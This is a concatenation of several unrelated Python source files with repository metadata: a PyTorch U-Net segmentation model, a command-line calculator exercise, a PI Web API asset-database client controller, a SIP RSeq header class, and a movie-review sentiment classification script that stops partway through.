train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 38
|
2020-02-19T14:23:32.000Z
|
2022-01-21T09:22:40.000Z
|
train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 6
|
2020-02-19T11:14:15.000Z
|
2022-03-12T00:16:25.000Z
|
train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 7
|
2020-04-07T20:07:52.000Z
|
2022-01-26T16:10:09.000Z
|
"""
Source: https://github.com/milesial/Pytorch-UNet
"""
import torch.nn as nn
import torch.nn.functional as F
import torch
class double_conv(nn.Module):
"""(conv => BN => ReLU) * 2"""
def __init__(self, in_ch, out_ch):
super(double_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
)
def forward(self, x):
x = self.conv(x)
return x
class inconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(inconv, self).__init__()
self.conv = double_conv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class down(nn.Module):
def __init__(self, in_ch, out_ch):
super(down, self).__init__()
self.mpconv = nn.Sequential(nn.MaxPool2d(2), double_conv(in_ch, out_ch))
def forward(self, x):
x = self.mpconv(x)
return x
class up(nn.Module):
def __init__(self, in_ch, out_ch, bilinear=True):
super(up, self).__init__()
if bilinear:
self.up = nn.UpsamplingBilinear2d(scale_factor=2)
else:
self.up = nn.ConvTranspose2d(in_ch, out_ch, 2, stride=2)
self.conv = double_conv(in_ch, out_ch)
def forward(self, x1, x2):
x1 = self.up(x1)
diffX = x1.size()[2] - x2.size()[2]
diffY = x1.size()[3] - x2.size()[3]
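        # Pad x2 so the skip connection matches x1's spatial size before the
        # concatenation below (for inputs with side lengths divisible by 16
        # the differences are zero and the padding is a no-op).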
x2 = F.pad(x2, (diffX // 2, int(diffX / 2), diffY // 2, int(diffY / 2)))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
class outconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(outconv, self).__init__()
self.conv = nn.Conv2d(in_ch, out_ch, 1)
def forward(self, x):
x = self.conv(x)
return x
class UNet(nn.Module):
def __init__(self, in_channels, n_classes):
super(UNet, self).__init__()
self.inc = inconv(in_channels + n_classes, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.up1 = up(1024, 256)
self.up2 = up(512, 128)
self.up3 = up(256, 64)
self.up4 = up(128, 64)
self.outc = outconv(64, n_classes)
self.net_name = "UNet"
def forward(self, x):
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x = self.up1(x5, x4)
x = self.up2(x, x3)
x = self.up3(x, x2)
x = self.up4(x, x1)
x = self.outc(x)
return x
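if __name__ == "__main__":
    # Illustrative sketch, not part of the original DISIR code: the DISIR-style
    # input concatenates the image with one sparse annotation channel per
    # class, hence the in_channels + n_classes input of UNet.
    net = UNet(in_channels=3, n_classes=5)
    dummy = torch.randn(1, 3 + 5, 256, 256)
    print(net(dummy).shape)  # torch.Size([1, 5, 256, 256])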
| 26.619048
| 80
| 0.549911
|
bf7e61f403f5a2b169aa3343d4074b7755b81f27
| 631
|
py
|
Python
|
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | 1
|
2021-04-26T03:45:12.000Z
|
2021-04-26T03:45:12.000Z
|
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | null | null | null |
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | 1
|
2022-02-02T02:44:35.000Z
|
2022-02-02T02:44:35.000Z
|
#!/usr/bin/python3
if __name__ == "__main__":
from calculator_1 import add, sub, mul, div
import sys
argv = sys.argv
if len(argv) != 4:
print("Usage: ./100-my_calculator.py <a> <operator> <b>")
sys.exit(1)
elif argv[2] == '+':
op = add
elif argv[2] == '-':
op = sub
elif argv[2] == '*':
op = mul
elif argv[2] == '/':
op = div
else:
print("Unknown operator. Available operators: +, -, * and /")
sys.exit(1)
result = op(int(argv[1]), int(argv[3]))
print("{} {} {} = {}".format(int(argv[1]), argv[2], int(argv[3]), result))
| 26.291667
| 78
| 0.494453
|
8ce7be4cb048e76c8125be5adcb766c8da03ae38
| 19,804
|
py
|
Python
|
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | 2
|
2022-03-02T17:42:21.000Z
|
2022-03-29T19:24:01.000Z
|
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from typing import List, Tuple, Union
from ...types import APIRequestType, ControllerType, QueryStrType
class AssetDatabases:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase.html
"""
CONTROLLER = "assetdatabases"
def __init__(self, constructor: ControllerType) -> None:
self._constructor = constructor
def get(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/get.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_by_path(
self,
path: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getbypath.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
path=path,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def find_analyses(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
start_index: int = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findanalyses.html
"""
action = "analyses"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def find_element_attributes(
self,
webid: str,
element_name_filter: QueryStrType = None,
element_description_filter: QueryStrType = None,
element_category: str = None,
element_template: str = None,
element_type: str = None,
attribute_name_filter: QueryStrType = None,
attribute_description_filter: QueryStrType = None,
attribute_category: str = None,
attribute_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findelementattributes.html
"""
action = "elementattributes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
element_name_filter=element_name_filter,
element_description_filter=element_description_filter,
element_category=element_category,
element_template=element_template,
element_type=element_type,
attribute_name_filter=attribute_name_filter,
attribute_description_filter=attribute_description_filter,
attribute_category=attribute_category,
attribute_type=attribute_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def find_event_frame_attributes(
self,
webid: str,
search_mode: str = None,
start_time: datetime = None,
end_time: datetime = None,
event_frame_name_filter: QueryStrType = None,
event_frame_description_filter: QueryStrType = None,
referenced_element_name_filter: QueryStrType = None,
event_frame_category: str = None,
event_frame_template: str = None,
attribute_name_filter: QueryStrType = None,
attribute_description_filter: QueryStrType = None,
attribute_category: str = None,
attribute_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findeventframeattributes.html
"""
action = "eventframeattributes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
search_mode=search_mode,
start_time=start_time,
end_time=end_time,
event_frame_name_filter=event_frame_name_filter,
event_frame_description_filter=event_frame_description_filter,
referenced_element_name_filter=referenced_element_name_filter,
event_frame_category=event_frame_category,
event_frame_template=event_frame_template,
attribute_name_filter=attribute_name_filter,
attribute_description_filter=attribute_description_filter,
attribute_category=attribute_category,
attribute_type=attribute_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_analysis_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getanalysiscategories.html
"""
action = "analysiscategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_analysis_templates(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getanalysistemplates.html
"""
action = "analysistemplates"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_attribute_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getattributecategories.html
"""
action = "attributecategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_element_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelementcategories.html
"""
action = "elementcategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_elements(
self,
webid: str,
name_filter: str = None,
description_filter: str = None,
category_name: str = None,
template_name: str = None,
element_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelements.html
"""
action ="elements"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
name_filter=name_filter,
description_filter=description_filter,
category_name=category_name,
template_name=template_name,
element_type=element_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_element_templates(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelementtemplates.html
"""
action = "elementtemplates"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_enumeration_sets(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getenumerationsets.html
"""
action = "enumerationsets"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_event_frames(
self,
webid: str,
search_mode: str = None,
start_time: datetime = None,
end_time: datetime = None,
name_filter: QueryStrType = None,
referenced_element_name_filter: QueryStrType = None,
category_name: str = None,
template_name: str = None,
referenced_element_template_name: str = None,
severity: Union[List[str], Tuple[str]] = None,
can_be_acknowledged: str = None,
        is_acknowledged: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/geteventframes.html
"""
action = "eventframes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
search_mode=search_mode,
start_time=start_time,
end_time=end_time,
name_filter=name_filter,
referenced_element_name_filter=referenced_element_name_filter,
category_name=category_name,
template_name=template_name,
referenced_element_template_name=referenced_element_template_name,
severity_many=severity,
can_be_acknowledged=can_be_acknowledged,
            is_acknowledged=is_acknowledged,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_referenced_elements(
self,
webid: str,
name_filter: QueryStrType = None,
description_filter: QueryStrType = None,
category_name: str = None,
template_name: str = None,
element_type: str = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getreferencedelements.html
"""
action = "referencedelements"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
name_filter=name_filter,
description_filter=description_filter,
category_name=category_name,
template_name=template_name,
element_type=element_type,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_security(
self,
webid: str,
security_item: Union[List[str], Tuple[str]] = None,
user_identity: Union[List[str], Tuple[str]] = None,
force_refresh: bool = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurity.html
"""
action = "security"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item_many=security_item,
user_identity_many=user_identity,
force_refresh=force_refresh,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_security_entries(
self,
webid: str,
security_item: str = None,
name_filter: QueryStrType = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurityentries.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
name_filter=name_filter,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_security_entry_by_name(
self,
webid: str,
name: str,
security_item: str = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurityentrybyname.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
selected_fields=selected_fields,
web_id_type=web_id_type,
            add_path=[name]
)
def get_table_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/gettablecategories.html
"""
action = "tablecategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
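    # ------------------------------------------------------------------
    # Editor's usage sketch (not taken from the original source): the
    # methods in this controller only *build* request descriptions via
    # `_build_request`; how they are executed depends on the surrounding
    # client, which is not shown here.  Names such as `pi_client`,
    # `asset_database` and `send()` below are assumptions for illustration.
    #
    #   req = pi_client.asset_database.get_elements(
    #       webid="F1RD-EXAMPLE-WEBID",    # hypothetical WebID
    #       name_filter="Pump*",
    #       search_full_hierarchy=True,
    #       max_count=100,
    #   )
    #   response = pi_client.send(req)     # hypothetical transport call
    # ------------------------------------------------------------------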
| 33.172529
| 134
| 0.599071
|
4585c96702e4043e4513a02cfc34aeaa2e511ed6
| 1,760
|
py
|
Python
|
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2015 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from SipNumericHF import SipNumericHF
class SipRSeq(SipNumericHF):
hf_names = ('rseq',)
def __init__(self, body = None, number = 1):
SipNumericHF.__init__(self, body, number)
def getCanName(self, name, compact = False):
return 'RSeq'
if __name__ == '__main__':
rs = SipRSeq(body = '50')
rs.parse()
    print(rs.number)
    rs.number = 100
    print(str(rs))
| 40.930233
| 82
| 0.753977
|
45d5a8773190ff4585826e2472fa81569d434550
| 15,269
|
py
|
Python
|
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | 1
|
2021-12-20T13:39:02.000Z
|
2021-12-20T13:39:02.000Z
|
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | null | null | null |
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | 2
|
2018-04-02T02:41:04.000Z
|
2018-04-04T16:36:40.000Z
|
import logging
import re
import time
import warnings
import nltk.data
import numpy as np
import pandas as pd
import sklearn
from bs4 import BeautifulSoup
from gensim.models import KeyedVectors, word2vec
from nltk.corpus import stopwords
from sklearn import metrics
from sklearn import naive_bayes, svm, preprocessing
from sklearn.decomposition import TruncatedSVD
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.feature_selection import chi2, SelectKBest
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
# #################### Initialization #####################
current_time = time.time()
warnings.simplefilter("ignore", UserWarning)
warnings.simplefilter("ignore", FutureWarning)
write_to_csv = False
# term_vector_type = {"TFIDF", "Binary", "Int", "Word2vec", "Word2vec_pretrained"}
# {"TFIDF", "Int", "Binary"}: Bag-of-words model with {tf-idf, word counts, presence/absence} representation
# {"Word2vec", "Word2vec_pretrained"}: Google word2vec representation {without, with} pre-trained models
# Specify model_name if there's a pre-trained model to be loaded
vector_type = "TFIDF"
model_name = "../data/GoogleNews-vectors-negative300.bin"
# model_type = {"bin", "reg"}
# Specify whether pre-trained word2vec model is binary
model_type = "bin"
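# Editor's illustration (assumed toy example, not part of the pipeline): for
# two phrases "good movie" and "good good plot" over the vocabulary
# [good, movie, plot], the bag-of-words options above would give roughly
#   "Int":    [1, 1, 0] and [2, 0, 1]   (raw counts)
#   "Binary": [1, 1, 0] and [1, 0, 1]   (presence/absence)
#   "TFIDF":  the counts re-weighted by inverse document frequency, so the
#             term "good", which appears in both phrases, is down-weighted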
# Parameters for word2vec
# num_features need to be identical with the pre-trained model
num_features = 300 # Word vector dimensionality
min_word_count = 40 # Minimum word count to be included for training
num_workers = 4 # Number of threads to run in parallel
context = 10 # Context window size
downsampling = 1e-3 # Downsample setting for frequent words
# training_model = {"RF", "NB", "SVM", "BT", "no"}
training_model = "RF"
# feature scaling = {"standard", "signed", "unsigned", "no"}
# Note: Scaling is needed for SVM
scaling = "no"
# dimension reduction = {"SVD", "chi2", "no"}
# Note: For NB models, we cannot perform truncated SVD as it will make input negative
# chi2 is the feature selection based on chi2 independence test
# https://nlp.stanford.edu/IR-book/html/htmledition/feature-selectionchi2-feature-selection-1.html
dim_reduce = "chi2"
num_dim = 500
# #################### End of Initialization #####################
# #################### Function Definition #####################
def clean_review(raw_review, remove_stopwords=False, output_format="string"):
"""
Input:
raw_review: raw text of a movie review
remove_stopwords: a boolean variable to indicate whether to remove stop words
output_format: if "string", return a cleaned string
if "list", a list of words extracted from cleaned string.
Output:
Cleaned string or list.
"""
# Remove HTML markup
    text = BeautifulSoup(raw_review, "html.parser")  # explicit parser keeps behaviour deterministic
# Keep only characters
text = re.sub("[^a-zA-Z]", " ", text.get_text())
# Split words and store to list
text = text.lower().split()
if remove_stopwords:
# Use set as it has O(1) lookup time
stops = set(stopwords.words("english"))
words = [w for w in text if w not in stops]
else:
words = text
# Return a cleaned string or list
if output_format == "string":
return " ".join(words)
elif output_format == "list":
return words
def review_to_doublelist(review, tokenizer, remove_stopwords=False):
"""
Function which generates a list of lists of words from a review for word2vec uses.
Input:
review: raw text of a movie review
tokenizer: tokenizer for sentence parsing
nltk.data.load('tokenizers/punkt/english.pickle')
remove_stopwords: a boolean variable to indicate whether to remove stop words
Output:
A list of lists.
The outer list consists of all sentences in a review.
The inner list consists of all words in a sentence.
"""
# Create a list of sentences
raw_sentences = tokenizer.tokenize(review.strip())
sentence_list = []
for raw_sentence in raw_sentences:
if len(raw_sentence) > 0:
sentence_list.append(clean_review(raw_sentence, False, "list"))
return sentence_list
def review_to_vec(words, model, num_features):
"""
Function which generates a feature vector for the given review.
Input:
words: a list of words extracted from a review
model: trained word2vec model
num_features: dimension of word2vec vectors
Output:
a numpy array representing the review
"""
feature_vec = np.zeros((num_features), dtype="float32")
word_count = 0
# index2word is a list consisting of all words in the vocabulary
# Convert list to set for speed
index2word_set = set(model.index2word)
for word in words:
if word in index2word_set:
word_count += 1
feature_vec += model[word]
    # Guard against reviews with no in-vocabulary words (avoids division by zero)
    if word_count > 0:
        feature_vec /= word_count
return feature_vec
def gen_review_vecs(reviews, model, num_features):
"""
Function which generates a m-by-n numpy array from all reviews,
where m is len(reviews), and n is num_feature
Input:
reviews: a list of lists.
Inner lists are words from each review.
Outer lists consist of all reviews
model: trained word2vec model
num_feature: dimension of word2vec vectors
Output: m-by-n numpy array, where m is len(review) and n is num_feature
"""
curr_index = 0
review_feature_vecs = np.zeros((len(reviews), num_features), dtype="float32")
for review in reviews:
        if curr_index % 1000 == 0:
print("Vectorizing review %d of %d" % (curr_index, len(reviews)))
review_feature_vecs[curr_index] = review_to_vec(review, model, num_features)
curr_index += 1
return review_feature_vecs
# #################### End of Function Definition #####################
# ########################## Main Program ###########################
test_size = 0.2
train_list = []
test_list = []
word2vec_input = []
pred = []
cols = ['PhraseId', 'SentenceId', 'Phrase']
target_names = ['0', '1', '2']
train_data = pd.read_csv("../data/train_mapped.tsv", header=0, delimiter="\t", quoting=0)
test_data = pd.read_csv("../data/test.tsv", header=0, delimiter="\t", quoting=0)
train_data, test_data, train_data_y, test_data_y = sklearn.model_selection.train_test_split(train_data[cols],
train_data['Sentiment'],
test_size=test_size,
random_state=19960214)
train_data = train_data.reset_index()
train_data = train_data.drop(['index'], axis=1)
test_data = test_data.reset_index()
test_data = test_data.drop(['index'], axis=1)
if vector_type == "Word2vec":
unlab_train_data = pd.read_csv("../data/train_extract.tsv", header=0, delimiter="\t", quoting=3)
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
logging.basicConfig(format='%(asctime)s: %(message)s', level=logging.INFO)
# Extract words from reviews
print('Start Extract Words from Reviews...')
# xrange is faster when iterating
if vector_type == "Word2vec" or vector_type == "Word2vec_pretrained":
for i in range(0, len(train_data.Phrase)):
if vector_type == "Word2vec":
# Decode utf-8 coding first
word2vec_input.extend(review_to_doublelist(train_data.Phrase[i], tokenizer))
train_list.append(clean_review(train_data.Phrase[i], output_format="list"))
if i % 1000 == 0:
print("Cleaning training review", i)
if vector_type == "Word2vec":
for i in range(0, len(unlab_train_data.Phrase)):
word2vec_input.extend(review_to_doublelist(unlab_train_data.Phrase[i], tokenizer))
if i % 1000 == 0:
print("Cleaning unlabeled training review", i)
for i in range(0, len(test_data.Phrase)):
test_list.append(clean_review(test_data.Phrase[i], output_format="list"))
if i % 1000 == 0:
print("Cleaning test review", i)
elif vector_type != "no":
for i in range(0, len(train_data.Phrase)):
# Append raw texts rather than lists as Count/TFIDF vectorizers take raw texts as inputs
train_list.append(clean_review(train_data.Phrase[i]))
if i % 1000 == 0:
print("Cleaning training review", i)
for i in range(0, len(test_data.Phrase)):
# Append raw texts rather than lists as Count/TFIDF vectorizers take raw texts as inputs
test_list.append(clean_review(test_data.Phrase[i]))
if i % 1000 == 0:
print("Cleaning test review", i)
# Generate vectors from words
if vector_type == "Word2vec_pretrained" or vector_type == "Word2vec":
if vector_type == "Word2vec_pretrained":
print("Loading the pre-trained model")
if model_type == "bin":
model = KeyedVectors.load_word2vec_format(model_name, binary=True)
else:
model = KeyedVectors.load(model_name)
if vector_type == "Word2vec":
print("Training word2vec word vectors")
model = word2vec.Word2Vec(word2vec_input, workers=num_workers,
size=num_features, min_count=min_word_count,
window=context, sample=downsampling)
# If no further training and only query is needed, this trims unnecessary memory
model.init_sims(replace=True)
# Save the model for later use
model.save(model_name)
print("Vectorizing training review")
train_vec = gen_review_vecs(train_list, model, num_features)
print("Vectorizing test review")
test_vec = gen_review_vecs(test_list, model, num_features)
elif vector_type != "no":
if vector_type == "TFIDF":
        # Word-level unigrams and bigrams with sublinear tf scaling (no vocabulary cap is applied)
count_vec = TfidfVectorizer(analyzer="word", ngram_range=(1, 2), sublinear_tf=True)
elif vector_type == "Binary" or vector_type == "Int":
count_vec = CountVectorizer(analyzer="word", binary=(vector_type == "Binary"),
ngram_range=(1, 2))
# Return a scipy sparse term-document matrix
print("Vectorizing input texts")
train_vec = count_vec.fit_transform(train_list)
test_vec = count_vec.transform(test_list)
# Dimension Reduction
print("Start Dimension Reduction...")
if dim_reduce == "SVD":
print("Performing dimension reduction")
svd = TruncatedSVD(n_components=num_dim)
